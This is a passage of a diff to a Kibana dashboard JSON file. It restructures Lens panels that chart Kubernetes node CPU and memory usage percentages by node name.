"55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" + ], + "columns": { + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - 
"filters": [ + "formula": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", + "isFormulaBroken": false + }, + "references": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" + ], + "scale": "ratio" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.usage.nanocores" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.allocatable.cores" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3a819463-89ca-494a-9d6a-9e600dccf098", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } + "args": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", + 1000000000 + ], + "location": { + "max": 99, + "min": 46 + }, + "name": "multiply", + "text": "max(kubernetes.node.cpu.allocatable.cores)*1000000000", + "type": "function" } - ], - "internalReferences": [], - "query": { - 
"language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", - "isTransposed": false - }, - { - "columnId": "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", - "isTransposed": false - }, - { - "columnId": "7ccec911-2e78-4c28-ade7-94447ebb88b2", - "isTransposed": false - }, - { - "columnId": "802c8bea-aecf-4d1b-9b54-84d527d1fc18", - "isTransposed": false - }, - { - "columnId": "968ccc98-9aab-42e0-9ae1-bb2767d38edb", - "isTransposed": false - }, - { - "columnId": "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", - "isTransposed": false - }, - { - "columnId": "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", - "isTransposed": false - }, - { - "columnId": "f146f523-db5b-4965-8486-615c98de32f7", - "isTransposed": false - } - ], - "layerId": "28060f62-4880-4b1c-aef2-fe42f9df0c64", - "layerType": "data" + ], + "location": { + "max": 100, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", + "type": "function" } + }, + "references": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1" + ], + "scale": "ratio" }, - "title": "Node Informations by Labels [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 8, - "i": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", - "w": 48, - "x": 0, - "y": 12 - }, - "panelIndex": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", - "title": "Node Informations by Labels [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "53703bad-9449-489b-84bd-35c1c8a8d710", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": 
{}, - "datasourceStates": { - "formBased": { - "layers": { - "f04e39cf-1a10-4841-86e3-53c07cb706df": { - "columnOrder": [ - "cbe72000-6be9-4a2d-aa1a-217370d18882", - "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" - ], - "columns": { - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", - "isFormulaBroken": false - }, - "references": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" - ], - "scale": "ratio" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.usage.nanocores" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.allocatable.cores" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - { - "args": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", - 1000000000 - ], - "location": { - "max": 99, - "min": 46 - }, - "name": "multiply", - "text": "max(kubernetes.node.cpu.allocatable.cores)*1000000000", - "type": 
"function" - } - ], - "location": { - "max": 100, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", - "type": "function" - } - }, - "references": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1" - ], - "scale": "ratio" - }, - "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cbe72000-6be9-4a2d-aa1a-217370d18882": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cbe72000-6be9-4a2d-aa1a-217370d18882": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "53703bad-9449-489b-84bd-35c1c8a8d710", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - 
"kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af" - ], - "layerId": "f04e39cf-1a10-4841-86e3-53c07cb706df", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "cbe72000-6be9-4a2d-aa1a-217370d18882", - "xAccessor": "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "53703bad-9449-489b-84bd-35c1c8a8d710", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + 
"query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "f11dcb2d-3850-430c-b365-e925473ffe81", - "w": 24, - "x": 0, - "y": 20 + "layers": [ + { + "accessors": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af" + ], + "layerId": "f04e39cf-1a10-4841-86e3-53c07cb706df", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "cbe72000-6be9-4a2d-aa1a-217370d18882", + "xAccessor": "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true }, - "panelIndex": "f11dcb2d-3850-430c-b365-e925473ffe81", - "title": "CPU usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + 
"title": "CPU usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "64187c9b-8038-47a3-b7df-6562d740840f", + "w": 24, + "x": 24, + "y": 20 + }, + "panelIndex": "64187c9b-8038-47a3-b7df-6562d740840f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89318796-9c5f-41c0-be0f-5545f0012e08", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { + "columnOrder": [ + "3bc424fc-c689-46a6-a701-f2a256b700b1", + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", + "b8d52304-59e9-4635-80b0-dac037233757", + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1", + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "columns": { + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "3bc424fc-c689-46a6-a701-f2a256b700b1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "89318796-9c5f-41c0-be0f-5545f0012e08", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { - "columnOrder": [ - "3bc424fc-c689-46a6-a701-f2a256b700b1", - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", - "b8d52304-59e9-4635-80b0-dac037233757", - 
"b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1", - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "columns": { - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "3bc424fc-c689-46a6-a701-f2a256b700b1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "b8d52304-59e9-4635-80b0-dac037233757": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", - "isFormulaBroken": false - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "scale": "ratio" - }, - "b8d52304-59e9-4635-80b0-dac037233757X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.usage.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.capacity.bytes" - }, - 
"b8d52304-59e9-4635-80b0-dac037233757X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "location": { - "max": 86, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", - "type": "function" - } - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "89318796-9c5f-41c0-be0f-5545f0012e08", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "b8d52304-59e9-4635-80b0-dac037233757": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, 
- "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b8d52304-59e9-4635-80b0-dac037233757" - ], - "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", - "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", + "isFormulaBroken": false + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "scale": "ratio" + }, + "b8d52304-59e9-4635-80b0-dac037233757X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.usage.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.capacity.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "location": { + "max": 86, + "min": 0 + }, + "name": "divide", + "text": 
"average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", + "type": "function" } + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "89318796-9c5f-41c0-be0f-5545f0012e08", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b8d52304-59e9-4635-80b0-dac037233757" + ], + "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", + "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 13, - "i": "64187c9b-8038-47a3-b7df-6562d740840f", - "w": 24, - "x": 24, - "y": 20 + "preferredSeriesType": "area", + 
"tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "64187c9b-8038-47a3-b7df-6562d740840f", - "title": "Memory usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { + "columnOrder": [ + "3bc424fc-c689-46a6-a701-f2a256b700b1", + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", + "b8d52304-59e9-4635-80b0-dac037233757", + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1", + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "columns": { + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "3bc424fc-c689-46a6-a701-f2a256b700b1": { + 
"dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { - "columnOrder": [ - "3bc424fc-c689-46a6-a701-f2a256b700b1", - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", - "b8d52304-59e9-4635-80b0-dac037233757", - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1", - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "columns": { - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "3bc424fc-c689-46a6-a701-f2a256b700b1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "b8d52304-59e9-4635-80b0-dac037233757": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", - "isFormulaBroken": false - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - 
"scale": "ratio" - }, - "b8d52304-59e9-4635-80b0-dac037233757X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.workingset.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.allocatable.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "location": { - "max": 94, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", - "type": "function" - } - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": 
"kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "b8d52304-59e9-4635-80b0-dac037233757": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b8d52304-59e9-4635-80b0-dac037233757" - ], - "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", - "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": 